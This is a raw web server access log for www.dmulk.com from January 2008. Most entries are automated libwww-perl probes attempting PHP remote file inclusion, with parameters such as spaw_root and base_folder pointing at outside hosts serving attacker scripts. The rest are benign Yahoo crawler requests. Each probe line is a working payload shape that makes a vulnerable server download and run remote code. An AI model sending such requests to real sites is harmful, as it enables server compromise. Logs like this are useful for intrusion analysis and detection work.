81.21.78.60 - - [02/Jan/2008:14:42:23 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:43:51 -0800] "GET /logs/access_071219.log//vwar/convert/mvcw.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:43:51 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:43:51 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:44:28 -0800] "GET /logs/access_071222.log//vwar/convert/mvcw.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.7.166.173 - - [02/Jan/2008:14:45:19 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.7.166.173 - - [02/Jan/2008:14:45:19 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.7.166.173 - - [02/Jan/2008:14:45:19 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.192.212 - - [02/Jan/2008:14:46:27 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://my3dwork.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.7.166.173 - - [02/Jan/2008:14:47:22 -0800] "GET /logs/access_071220.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.7.166.170 - - [02/Jan/2008:14:47:23 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.7.166.170 - - [02/Jan/2008:14:47:24 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:14:47:29 -0800] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:14:47:45 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.78.60 - - [02/Jan/2008:14:47:46 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.78.60 - - [02/Jan/2008:14:47:46 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.7.166.173 - - [02/Jan/2008:14:48:10 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.7.166.170 - - [02/Jan/2008:14:49:56 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.78.60 - - [02/Jan/2008:14:51:04 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:14:52:56 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:14:54:10 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.20 - - [02/Jan/2008:14:54:10 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://wooshck.org/rotation/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:14:56:52 -0800] "GET /logs/access_071214.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.137.33 - - [02/Jan/2008:14:56:53 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://wooshck.org/rotation/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.127.2.150 - - [02/Jan/2008:14:57:29 -0800] "GET //skin/zero_vote/error.php?dir=http://66.220.9.57/web/hyp3r/a.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.217.130 - - [02/Jan/2008:14:59:38 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [02/Jan/2008:15:04:44 -0800] "GET /logs/access_071220.log/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [02/Jan/2008:15:04:44 -0800] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [02/Jan/2008:15:04:45 -0800] "GET /logs/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.16.224.119 - - [02/Jan/2008:15:04:46 -0800] "GET /logs/access_071210.log/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.adevarat-games.com/douceur/mambots/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:15:05:18 -0800] "GET /logs/access_071205.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.madinaedu.gov.sa/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [02/Jan/2008:15:06:16 -0800] "GET /logs/access_071224.log/config.php?path_to_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [02/Jan/2008:15:06:16 -0800] "GET /config.php?path_to_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.50.14.189 - - [02/Jan/2008:15:06:17 -0800] "GET /logs/config.php?path_to_root=https://www1.aiim.com/sqmail/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.145.107 - - [02/Jan/2008:15:07:07 -0800] "GET /logs/access_071205.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:15:08:59 -0800] "GET /logs/access_071220.log/modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:15:09:00 -0800] "GET /modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.21.78.60 - - [02/Jan/2008:15:09:00 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.144.26 - - [02/Jan/2008:15:13:06 -0800] "GET /logs/access_071220.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [02/Jan/2008:15:13:07 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [02/Jan/2008:15:13:07 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.144.26 - - [02/Jan/2008:15:13:40 -0800] "GET /logs/access_071219.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:15:18:33 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.241.168.186 - - [02/Jan/2008:15:20:35 -0800] "GET /logs/access_071205.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/id??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.6.118.136 - - [02/Jan/2008:15:21:09 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:15:32:57 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.155.30 - - [02/Jan/2008:15:32:57 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.132.170 - - [02/Jan/2008:15:32:59 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.32.229 - - [02/Jan/2008:15:33:43 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.20.52 - - [02/Jan/2008:15:33:56 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.98.100.218 - - [02/Jan/2008:15:34:02 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.85.71 - - [02/Jan/2008:15:34:08 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.241.248.172 - - [02/Jan/2008:15:34:08 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:34:13 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:34:13 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.141.10 - - [02/Jan/2008:15:34:17 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:34:17 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:34:18 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:34:18 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:34:19 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [02/Jan/2008:15:34:19 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:34:25 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:34:25 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.231.28.118 - - [02/Jan/2008:15:34:36 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
122.153.194.3 - - [02/Jan/2008:15:34:39 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:34:52 -0800] "GET /retreat1/IMG_2749.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
69.73.141.10 - - [02/Jan/2008:15:35:07 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.73.141.10 - - [02/Jan/2008:15:35:17 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
122.203.64.246 - - [02/Jan/2008:15:35:34 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:15:35:54 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.7.166.173 - - [02/Jan/2008:15:36:00 -0800] "GET /logs/access_071205.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:36:05 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.203.6 - - [02/Jan/2008:15:36:23 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.58.254.89 - - [02/Jan/2008:15:36:43 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.51.87.246 - - [02/Jan/2008:15:36:55 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.141.10 - - [02/Jan/2008:15:37:01 -0800] "GET /logs/access_071219.log//modules/Neos_Chronos/header.php?base_folder=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:37:50 -0800] "GET /retreat1/IMG_2767.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:37:55 -0800] "GET /retreat1/IMG_2678.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:38:15 -0800] "GET /retreat1/IMG_2703.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:38:57 -0800] "GET /retreat1/IMG_2683.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
218.27.203.44 - - [02/Jan/2008:15:39:50 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:39:58 -0800] "GET /retreat1/IMG_2738.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:40:48 -0800] "GET /retreat1/IMG_2735.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:42:06 -0800] "GET /retreat1/IMG_2778.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:42:22 -0800] "GET /retreat1/IMG_2753.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:42:46 -0800] "GET /retreat1/IMG_2760.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
203.116.91.37 - - [02/Jan/2008:15:43:57 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:44:00 -0800] "GET /retreat1/IMG_2697.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
206.221.179.200 - - [02/Jan/2008:15:44:47 -0800] "GET /logs/access_071219.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [02/Jan/2008:15:44:47 -0800] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [02/Jan/2008:15:44:47 -0800] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:45:35 -0800] "GET /retreat1/IMG_2758.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
206.221.179.200 - - [02/Jan/2008:15:45:47 -0800] "GET /logs/access_071222.log//vwar/convert/mvcw.php?step=1&vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.160 - - [02/Jan/2008:15:45:52 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:46:15 -0800] "GET /retreat1/IMG_2761.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:46:36 -0800] "GET /retreat1/IMG_2677.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:47:18 -0800] "GET /retreat1/IMG_2705.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:48:24 -0800] "GET /retreat1/IMG_2709.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
222.231.28.118 - - [02/Jan/2008:15:48:35 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.231.28.118 - - [02/Jan/2008:15:48:36 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.231.28.118 - - [02/Jan/2008:15:48:36 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:48:42 -0800] "GET /retreat1/IMG_2756.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:49:03 -0800] "GET /retreat1/IMG_2715.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:49:25 -0800] "GET /retreat1/IMG_2704.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:49:26 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:49:27 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:49:27 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.142.212.185 - - [02/Jan/2008:15:49:45 -0800] "GET /megumi/Necklace/23_Olive_Jade_Sterling_Silver_25.JPG HTTP/1.0" 304 - "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:49:45 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:49:46 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.196.150.6 - - [02/Jan/2008:15:49:46 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
143.248.135.48 - - [02/Jan/2008:15:49:49 -0800] "GET /logs/access_071222.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.98.100.218 - - [02/Jan/2008:15:49:59 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.100.218 - - [02/Jan/2008:15:49:59 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.100.218 - - [02/Jan/2008:15:49:59 -0800] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:15:50:00 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.221.90 - - [02/Jan/2008:15:50:01 -0800] "GET //modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
